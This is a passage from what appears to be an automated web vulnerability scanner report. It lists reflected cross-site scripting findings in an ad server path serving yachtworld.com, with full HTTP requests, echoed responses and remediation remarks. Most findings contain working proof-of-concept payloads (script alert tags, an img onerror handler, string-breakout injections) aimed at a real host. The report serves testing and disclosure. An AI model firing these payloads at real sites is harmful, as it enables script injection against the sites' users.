<IMG SRC="http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/boatsearch.html1ec0d"><script>alert(1)</script>2878b6bfc1/L37/1527799939/Top1/Boats/bayliner8-cruiser-yen-as/sr1-bayliner8-cruiser-yen-728.html/7263485738303033424c73414270536c?_RM_EMPTY_&" WIDTH=2 HEIGHT=2>

1.7. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/boatsearch.html/L37/913898925/Top1/Boats/bayliner8-cruiser-yen-as/sr1-bayliner8-cruiser-yen-728.html/7263485738303033424c73414270536c [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/boatsearch.html/L37/913898925/Top1/Boats/bayliner8-cruiser-yen-as/sr1-bayliner8-cruiser-yen-728.html/7263485738303033424c73414270536c

Issue detail

The value of REST URL parameter 7 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fe14a"-alert(1)-"b9653bfa37 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/boatsearch.html/L37fe14a"-alert(1)-"b9653bfa37/913898925/Top1/Boats/bayliner8-cruiser-yen-as/sr1-bayliner8-cruiser-yen-728.html/7263485738303033424c73414270536c HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl; RMFS=011PiXSrU30erBjd|U10esfwB;

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:43:40 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1691
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/


<script type="text/javascript">
//<![CDATA[
var filePath = "http://imagec17.247realmedia.com/RealMedia/ads/Creatives/Boats/bayliner8-cruiser-yen-as/728-cruiser-bayliner8.swf/
...[SNIP]...
= "10";
var TFSMFlash_WMODE = "opaque";

           var TFSMFlash_OASCLICK = "http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.yachtworld.com/en/boatsearch.html/L37fe14a"-alert(1)-"b9653bfa37/L/567676331/Top1/Boats/bayliner8-cruiser-yen-as/sr1-bayliner8-cruiser-yen-728.html/7263485738303033424c73414270536c";
   

var TFSMFlash_SWFCLICKVARIABLE = "?clickTAG="+TFSMFlash_OASCLICK + "";

...[SNIP]...

1.8. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/boatsearch.html/L37/913898925/Top1/Boats/bayliner8-cruiser-yen-as/sr1-bayliner8-cruiser-yen-728.html/7263485738303033424c73414270536c [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/boatsearch.html/L37/913898925/Top1/Boats/bayliner8-cruiser-yen-as/sr1-bayliner8-cruiser-yen-728.html/7263485738303033424c73414270536c

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1c43f"><script>alert(1)</script>694080b4023 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/boatsearch.html/L371c43f"><script>alert(1)</script>694080b4023/913898925/Top1/Boats/bayliner8-cruiser-yen-as/sr1-bayliner8-cruiser-yen-728.html/7263485738303033424c73414270536c HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl; RMFS=011PiXSrU30erBjd|U10esfwB;

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:43:40 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1725
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/


<script type="text/javascript">
//<![CDATA[
var filePath = "http://imagec17.247realmedia.com/RealMedia/ads/Creatives/Boats/bayliner8-cruiser-yen-as/728-cruiser-bayliner8.swf/
...[SNIP]...
<IMG SRC="http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/boatsearch.html/L371c43f"><script>alert(1)</script>694080b4023/L/1954471835/Top1/Boats/bayliner8-cruiser-yen-as/sr1-bayliner8-cruiser-yen-728.html/7263485738303033424c73414270536c?_RM_EMPTY_&" WIDTH=2 HEIGHT=2>

1.9. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/boatsearch.html/L37/913898925/Top1/Boats/bayliner8-cruiser-yen-as/sr1-bayliner8-cruiser-yen-728.html/7263485738303033424c73414270536c [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/boatsearch.html/L37/913898925/Top1/Boats/bayliner8-cruiser-yen-as/sr1-bayliner8-cruiser-yen-728.html/7263485738303033424c73414270536c

Issue detail

The value of REST URL parameter 9 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b5d15"><img%20src%3da%20onerror%3dalert(1)>c47d8560be5 was submitted in the REST URL parameter 9. This input was echoed as b5d15"><img src=a onerror=alert(1)>c47d8560be5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/boatsearch.html/L37/913898925/Top1b5d15"><img%20src%3da%20onerror%3dalert(1)>c47d8560be5/Boats/bayliner8-cruiser-yen-as/sr1-bayliner8-cruiser-yen-728.html/7263485738303033424c73414270536c HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl; RMFS=011PiXSrU30erBjd|U10esfwB;

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:43:40 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1773
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/


<script type="text/javascript">
//<![CDATA[
var filePath = "http://imagec17.247realmedia.com/RealMedia/ads/Creatives/Boats/bayliner8-cruiser-yen-as/728-cruiser-bayliner8.swf/
...[SNIP]...
<IMG SRC="http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/boatsearch.html/L37/1186153063/Top1b5d15"><img src=a onerror=alert(1)>c47d8560be5/Boats/bayliner8-cruiser-yen-as/sr1-bayliner8-cruiser-yen-728.html/7263485738303033424c73414270536c?_RM_EMPTY_&" WIDTH=2 HEIGHT=2>

1.10. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/boatsearch.html/L37/913898925/Top1/Boats/bayliner8-cruiser-yen-as/sr1-bayliner8-cruiser-yen-728.html/7263485738303033424c73414270536c [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/boatsearch.html/L37/913898925/Top1/Boats/bayliner8-cruiser-yen-as/sr1-bayliner8-cruiser-yen-728.html/7263485738303033424c73414270536c

Issue detail

The value of REST URL parameter 9 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aed77"-alert(1)-"a5b5a3f2ea6 was submitted in the REST URL parameter 9. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/boatsearch.html/L37/913898925/Top1aed77"-alert(1)-"a5b5a3f2ea6/Boats/bayliner8-cruiser-yen-as/sr1-bayliner8-cruiser-yen-728.html/7263485738303033424c73414270536c HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl; RMFS=011PiXSrU30erBjd|U10esfwB;

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:43:41 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1719
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/


<script type="text/javascript">
//<![CDATA[
var filePath = "http://imagec17.247realmedia.com/RealMedia/ads/Creatives/Boats/bayliner8-cruiser-yen-as/728-cruiser-bayliner8.swf/
...[SNIP]...
TFSMFlash_WMODE = "opaque";

           var TFSMFlash_OASCLICK = "http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.yachtworld.com/en/boatsearch.html/L37/2023978167/Top1aed77"-alert(1)-"a5b5a3f2ea6/Boats/bayliner8-cruiser-yen-as/sr1-bayliner8-cruiser-yen-728.html/7263485738303033424c73414270536c";
   

var TFSMFlash_SWFCLICKVARIABLE = "?clickTAG="+TFSMFlash_OASCLICK + "";
var TFSMFlash_SWF
...[SNIP]...

1.11. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/boatsearch.html/L37/913898925/Top1/Boats/bayliner8-cruiser-yen-as/sr1-bayliner8-cruiser-yen-728.html/7263485738303033424c73414270536c [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/boatsearch.html/L37/913898925/Top1/Boats/bayliner8-cruiser-yen-as/sr1-bayliner8-cruiser-yen-728.html/7263485738303033424c73414270536c

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ea230"><script>alert(1)</script>31957e884f4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/boatsearch.html/L37/913898925/Top1/Boats/bayliner8-cruiser-yen-as/sr1-bayliner8-cruiser-yen-728.html/7263485738303033424c73414270536c?ea230"><script>alert(1)</script>31957e884f4=1 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl; RMFS=011PiXSrU30erBjd|U10esfwB;

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:43:38 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1678
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/


<script type="text/javascript">
//<![CDATA[
var filePath = "http://imagec17.247realmedia.com/RealMedia/ads/Creatives/Boats/bayliner8-cruiser-yen-as/728-cruiser-bayliner8.swf/
...[SNIP]...
com/RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/boatsearch.html/L37/736447110/Top1/Boats/bayliner8-cruiser-yen-as/sr1-bayliner8-cruiser-yen-728.html/7263485738303033424c73414270536c?_RM_EMPTY_&ea230"><script>alert(1)</script>31957e884f4=1" WIDTH=2 HEIGHT=2>

1.12. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/homepage.html/L35/1838745994/Position2/Boats/seabob2-yen-hp300/seabob-yen-video-hp300.html/7263485738303033424c73414270536c [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/homepage.html/L35/1838745994/Position2/Boats/seabob2-yen-hp300/seabob-yen-video-hp300.html/7263485738303033424c73414270536c

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cf6e2"%3bdf1020321d2 was submitted in the REST URL parameter 4. This input was echoed as cf6e2";df1020321d2 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /RealMedia/ads/adstream_lx.ads/www.yachtworld.comcf6e2"%3bdf1020321d2/en/homepage.html/L35/1838745994/Position2/Boats/seabob2-yen-hp300/seabob-yen-video-hp300.html/7263485738303033424c73414270536c HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl; RMFS=011PiXSrU30erBjd|U10esfwB;

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:43:38 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1358
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<SCRIPT type="text/javascript">
var TFSMFlash_PRETAG="";
var TFSMFlash_POSTTAG="";
var TFSMFlash_VERSION="8";
var TFSMFlash_WMODE="opaque";
var TFSMFlash_OASCLICK="http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.yachtworld.comcf6e2";df1020321d2/en/homepage.html/L35/389115066/Position2/Boats/seabob2-yen-hp300/seabob-yen-video-hp300.html/7263485738303033424c73414270536c?";
var TFSMFlash_SWFCLICKVARIABLE="?clickTAG="+TFSMFlash_OASCLICK ;
var
...[SNIP]...

1.13. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/homepage.html/L35/1838745994/Position2/Boats/seabob2-yen-hp300/seabob-yen-video-hp300.html/7263485738303033424c73414270536c [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/homepage.html/L35/1838745994/Position2/Boats/seabob2-yen-hp300/seabob-yen-video-hp300.html/7263485738303033424c73414270536c

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d0e99"><script>alert(1)</script>5bec7106c43 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_lx.ads/www.yachtworld.comd0e99"><script>alert(1)</script>5bec7106c43/en/homepage.html/L35/1838745994/Position2/Boats/seabob2-yen-hp300/seabob-yen-video-hp300.html/7263485738303033424c73414270536c HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl; RMFS=011PiXSrU30erBjd|U10esfwB;

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:43:38 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1408
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<SCRIPT type="text/javascript">
var TFSMFlash_PRETAG="";
var TFSMFlash_POSTTAG="";
var TFSMFlash_VERSION="8";
var TFSMFlash_WMODE="opaque";
var TFSMFlash_OASCLICK="http://oasc05139.247realmed
...[SNIP]...
<IMG SRC="http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.yachtworld.comd0e99"><script>alert(1)</script>5bec7106c43/en/homepage.html/L35/982391706/Position2/Boats/seabob2-yen-hp300/seabob-yen-video-hp300.html/7263485738303033424c73414270536c?_RM_EMPTY_&" WIDTH=2 HEIGHT=2>

1.14. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/homepage.html/L35/1838745994/Position2/Boats/seabob2-yen-hp300/seabob-yen-video-hp300.html/7263485738303033424c73414270536c [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/homepage.html/L35/1838745994/Position2/Boats/seabob2-yen-hp300/seabob-yen-video-hp300.html/7263485738303033424c73414270536c

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d4f04"%3b100fccedffa was submitted in the REST URL parameter 5. This input was echoed as d4f04";100fccedffa in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /RealMedia/ads/adstream_lx.ads/www.yachtworld.com/end4f04"%3b100fccedffa/homepage.html/L35/1838745994/Position2/Boats/seabob2-yen-hp300/seabob-yen-video-hp300.html/7263485738303033424c73414270536c HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl; RMFS=011PiXSrU30erBjd|U10esfwB;

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:43:38 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1358
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<SCRIPT type="text/javascript">
var TFSMFlash_PRETAG="";
var TFSMFlash_POSTTAG="";
var TFSMFlash_VERSION="8";
var TFSMFlash_WMODE="opaque";
var TFSMFlash_OASCLICK="http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.yachtworld.com/end4f04";100fccedffa/homepage.html/L35/730654398/Position2/Boats/seabob2-yen-hp300/seabob-yen-video-hp300.html/7263485738303033424c73414270536c?";
var TFSMFlash_SWFCLICKVARIABLE="?clickTAG="+TFSMFlash_OASCLICK ;
var TF
...[SNIP]...

1.15. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/homepage.html/L35/1838745994/Position2/Boats/seabob2-yen-hp300/seabob-yen-video-hp300.html/7263485738303033424c73414270536c [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/homepage.html/L35/1838745994/Position2/Boats/seabob2-yen-hp300/seabob-yen-video-hp300.html/7263485738303033424c73414270536c

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5316c"><script>alert(1)</script>999d7e80f63 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en5316c"><script>alert(1)</script>999d7e80f63/homepage.html/L35/1838745994/Position2/Boats/seabob2-yen-hp300/seabob-yen-video-hp300.html/7263485738303033424c73414270536c HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl; RMFS=011PiXSrU30erBjd|U10esfwB;

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:43:38 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1408
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<SCRIPT type="text/javascript">
var TFSMFlash_PRETAG="";
var TFSMFlash_POSTTAG="";
var TFSMFlash_VERSION="8";
var TFSMFlash_WMODE="opaque";
var TFSMFlash_OASCLICK="http://oasc05139.247realmed
...[SNIP]...
<IMG SRC="http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en5316c"><script>alert(1)</script>999d7e80f63/homepage.html/L35/707936307/Position2/Boats/seabob2-yen-hp300/seabob-yen-video-hp300.html/7263485738303033424c73414270536c?_RM_EMPTY_&" WIDTH=2 HEIGHT=2>

1.16. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/homepage.html/L35/1838745994/Position2/Boats/seabob2-yen-hp300/seabob-yen-video-hp300.html/7263485738303033424c73414270536c [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/homepage.html/L35/1838745994/Position2/Boats/seabob2-yen-hp300/seabob-yen-video-hp300.html/7263485738303033424c73414270536c

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c9668"><script>alert(1)</script>63f6bb26e70 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/homepage.htmlc9668"><script>alert(1)</script>63f6bb26e70/L35/1838745994/Position2/Boats/seabob2-yen-hp300/seabob-yen-video-hp300.html/7263485738303033424c73414270536c HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl; RMFS=011PiXSrU30erBjd|U10esfwB;

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:43:38 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1410
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<SCRIPT type="text/javascript">
var TFSMFlash_PRETAG="";
var TFSMFlash_POSTTAG="";
var TFSMFlash_VERSION="8";
var TFSMFlash_WMODE="opaque";
var TFSMFlash_OASCLICK="http://oasc05139.247realmed
...[SNIP]...
<IMG SRC="http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/homepage.htmlc9668"><script>alert(1)</script>63f6bb26e70/L35/1837090905/Position2/Boats/seabob2-yen-hp300/seabob-yen-video-hp300.html/7263485738303033424c73414270536c?_RM_EMPTY_&" WIDTH=2 HEIGHT=2>

1.17. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/homepage.html/L35/1838745994/Position2/Boats/seabob2-yen-hp300/seabob-yen-video-hp300.html/7263485738303033424c73414270536c [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/homepage.html/L35/1838745994/Position2/Boats/seabob2-yen-hp300/seabob-yen-video-hp300.html/7263485738303033424c73414270536c

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 98647"-alert(1)-"dcca8500db7 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/homepage.html98647"-alert(1)-"dcca8500db7/L35/1838745994/Position2/Boats/seabob2-yen-hp300/seabob-yen-video-hp300.html/7263485738303033424c73414270536c HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl; RMFS=011PiXSrU30erBjd|U10esfwB;

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:43:39 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1380
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<SCRIPT type="text/javascript">
var TFSMFlash_PRETAG="";
var TFSMFlash_POSTTAG="";
var TFSMFlash_VERSION="8";
var TFSMFlash_WMODE="opaque";
